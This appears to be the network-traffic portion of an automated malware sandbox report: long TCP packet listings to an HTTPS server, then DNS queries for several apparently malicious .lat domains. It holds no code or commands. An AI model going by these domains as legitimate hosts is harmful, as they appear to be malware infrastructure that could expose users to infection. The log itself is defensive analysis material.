                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383331060 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383336067 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383414984 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.383903980 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386631966 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386652946 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386698961 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386704922 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.386750937 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.387722969 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558099985 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558130026 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558295965 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558317900 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558463097 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.558653116 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.561393976 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.561408997 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.561471939 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.561489105 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.564924002 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.564961910 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.564991951 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.565073967 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.565073967 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.565090895 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.565139055 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.567581892 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.567596912 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.567725897 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.567734003 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.567807913 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.567867041 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.571136951 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.571151018 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.571193933 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.571199894 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.571293116 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.573980093 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.573995113 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.574112892 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.574120045 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577421904 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577451944 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577497959 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577532053 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577539921 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577656984 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.577656984 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.602946043 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.749392033 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.749416113 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.749444962 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.749593019 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.749604940 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.749625921 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752146959 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752171040 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752209902 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752217054 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752290964 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752821922 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.752859116 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.755534887 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.755552053 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.755592108 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.755626917 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.755635023 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.755681992 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.758250952 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.759103060 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.759118080 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.759146929 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.759195089 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.759201050 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.759299040 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.761712074 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.761734009 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.761862993 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.761879921 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.761940956 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.761950970 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.764739037 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.764754057 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.764818907 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.764827967 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.764868975 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768121004 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768152952 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768182993 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768204927 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768212080 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768246889 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768282890 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.768601894 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.771650076 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.771667957 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.771701097 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.771737099 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.771744013 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.771778107 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.812879086 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.843605995 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.943444014 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.943470955 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.943516970 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.943552017 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.943566084 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.943629026 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946033001 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946053982 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946090937 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946096897 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946182966 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946188927 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.946233988 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.949546099 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.949561119 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.949587107 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.949645996 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.949654102 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.949701071 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953838110 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953855991 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953936100 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953946114 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.953963995 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955749035 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955782890 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955815077 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955823898 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.955867052 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958617926 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958635092 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958715916 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958733082 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958784103 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.958796024 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962121010 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962140083 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962187052 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962194920 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:07.962266922 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.016078949 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134722948 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134749889 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134799004 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134864092 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134884119 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.134926081 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138072014 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138092995 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138171911 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138180017 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.138211966 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141473055 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141520023 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141565084 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141572952 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.141609907 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144201994 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144232035 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144330025 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144330025 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.144337893 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148041964 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148087025 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148119926 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148128986 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148273945 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.148391962 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.150331974 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151278019 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151298046 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151343107 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151348114 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151376009 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151391029 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.151401043 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154408932 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154423952 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154499054 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.154516935 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.156956911 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.156984091 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.157022953 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.157037973 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.157102108 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.203490019 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.203500986 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.250415087 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.327999115 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328360081 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328370094 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328411102 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328439951 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328447104 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328458071 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328464985 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.328547001 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331152916 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331161022 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331182003 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331203938 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331219912 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331226110 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331254005 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.331288099 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.334532022 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.334547043 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.334594011 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.334599018 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.334638119 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.334644079 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336450100 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336477041 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336533070 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336539030 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336555004 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336580038 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.336635113 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.355447054 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:08.784339905 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:09.031687975 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:09.031718016 CET4434977752.216.152.124192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:09.031728029 CET49777443192.168.2.1152.216.152.124
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:09.031734943 CET4434977752.216.152.124192.168.2.11

                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.343969107 CET5805753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.655051947 CET53580571.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.718564034 CET6543353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.855979919 CET53654331.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.999352932 CET5066553192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.138312101 CET53506651.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.142280102 CET5466753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.282260895 CET53546671.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.285155058 CET6025353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.426251888 CET53602531.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.428034067 CET5118053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.566272020 CET53511801.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.569422960 CET6027753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.707509041 CET53602771.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.727425098 CET5521853192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.866034985 CET53552181.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.867809057 CET6359053192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.005785942 CET53635901.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.009021044 CET5272153192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:37.145844936 CET53527211.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:39.643023968 CET6439253192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:39.780579090 CET53643921.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:01.604849100 CET6311453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:01.743938923 CET53631141.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:03.825937033 CET6532353192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:41:04.131195068 CET53653231.1.1.1192.168.2.11

                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.343969107 CET192.168.2.111.1.1.10xed50Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.718564034 CET192.168.2.111.1.1.10xbf46Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:35.999352932 CET192.168.2.111.1.1.10x5d09Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.142280102 CET192.168.2.111.1.1.10x39bfStandard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 23, 2024 08:40:36.285155058 CET192.168.2.111.1.1.10xfa68Standard query (0)energyaffai.latA (IP address)IN (0x0001)false
